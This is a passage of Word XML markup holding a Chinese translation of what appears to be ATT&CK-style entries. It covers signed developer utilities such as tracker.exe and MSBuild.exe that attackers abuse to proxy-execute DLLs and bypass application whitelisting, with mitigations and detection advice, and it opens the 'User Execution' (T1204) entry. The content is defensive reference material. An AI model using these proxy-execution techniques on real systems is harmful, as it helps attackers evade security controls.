    <w:p w14:paraId="23D85D11" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件跟踪器实用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tracker.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSBuild</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一部分包含在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架中。它用于记录</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件系统的调用日志。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E770940" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tracker.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来代理执行任意动态链接库到另一个进程中。由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tracker.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也已签名，因此可用于绕过应用白名单解决方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AABF4D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="49672AEF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6C79F21E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1D4A6090" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2A49FB10" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15E6FCA0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>程序禁用或</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59764BE2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在给定环境中可能不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>MSBuild.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>dnx.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>rcsi.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WinDbg.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cdb.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>tracker.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。如果不需要，应将其删除。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7C939175" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7331661B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49271D15" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果给定系统或网络不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>MSBuild.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>dnx.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>rcsi.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WinDbg.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>cdb.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，则使用应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（用于</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>这些程序</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）来防止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>攻击者滥用它</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>们</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="444025BF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF4EE1F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5FFE05" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在非用于开发</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>、调试和逆向工程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>系统上</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现通常用于开发、调试和逆向工程的且</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>已开通代理执行功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的实用程序可能是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A0C8E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测和分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSBuild.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dnx.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rcsi.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinDbg.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cdb.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tracker.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行和参数。将这些实用程序的最近调用与已知恰当参数及已执行二进制文件的历史记录进行比较来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常和潜藏的攻击活动。这些实用程序很可能会被软件开</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>发人员使用或用于其他与软件开发相关的任务。因此，如果监控到这些程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>而且该程序在所提</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>情境</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>之外使用，那么这个事件是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在实用程序调用之前和之后使用的命令参数也可用于确定正在执行的二进制文件的来源和目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A472905" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用户执行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="4E0458ED" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56FD7104" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B82704">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:t>: T1204</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53E59C3D" w14:textId="29FE06B0" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="00EB54DA" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665" w:rsidRPr="00B82704">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2665" w:rsidRPr="00B82704">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AA7BEAE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B82704">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:t xml:space="preserve"> Linux, Windows, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="004AEFFB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B82704">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55E530B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B82704" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B82704">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>杀毒软件，进程命令行参数，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="548A0590" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B82704">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B82704">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17D4605B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498137E2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以依靠用户的特定动作来获得执行。这可能是直接的代码执行，例如当用户打开一个恶意可执行文件时，该文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钓鱼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附件传递</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带有图标和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>明显的</w:t>
      </w:r>
      <w:r>
        <w:t>扩展名</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。它还可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他执行技术，例如当用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钓鱼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击链接时</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，会导致通过客户端执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:t>技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来利用浏览器或应用程序漏洞。虽然用户执行经常发生在</w:t>
      </w:r>
      <w:r w:rsidRPr="0004179B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后不久，但也可能发生在入侵的其他阶段，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如攻击者会</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将文件放在共享目录或用户桌面上，希望</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有用户</w:t>
      </w:r>
      <w:r>
        <w:t>会点击它</w:t>
      </w:r>
      <w:r w:rsidRPr="00031A7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D49B51C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2445"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="04B4F810" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
